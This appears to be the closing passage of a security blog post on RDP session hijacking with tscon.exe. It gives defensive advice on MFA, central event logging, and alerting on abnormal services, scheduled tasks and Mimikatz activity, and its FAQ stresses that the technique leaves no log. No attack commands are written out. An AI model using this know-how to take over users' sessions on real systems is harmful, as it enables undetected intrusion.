Don’t expose RDS/RDP to the internet — if you do, I strongly suggest you implement multi-factor authentication. You can use things like Microsoft RD Gateway or Azure Multi-Factor Authentication Server to get very low cost multi-factor authentication. If you’re exposing RDP directly to the internet and somebody creates a local user or your domain users have easy to guess or reused credentials, things will go downhill fast. Trust me — I’ve seen hospitals and others be ransomware’d by RDS servers.


It is surprisingly very difficult to record session hijacking — there is one event log (Microsoft-Windows-TerminalServices-LocalSessionManager/Operational) which records sessions connecting — however it does not appear to differentiate between a normal user connecting and tscon.exe being used — I’ve been through every other event log and can’t see anything which suggests this is happening. This is actually a major issue and I lobby Microsoft to add some kind of Event Log ASAP — it’s a real gap.

My suggestion is you alert for other related behaviour using the Event Log and tools like Microsoft OMS, Windows Event Forwarding, Splunk etc. You’re looking for SYSTEM being misused.

For example abnormal Service creation and abnormal scheduled task creation should be logged centrally, and recorded against. Additionally, you can look for Mimikatz related activity.

  • k


Q: This isn’t new or a vulnerability.

A: Java applets and macros aren’t new. If the technique works, it will get used. This one has flown under the radar — that doesn’t mean it is not valid.

Q: If you have SYSTEM you already own the box.

A: Correct. Can you type one command and get the unlocked desktop of a user, even if they went on holiday a week ago, without a log of it? Now you can.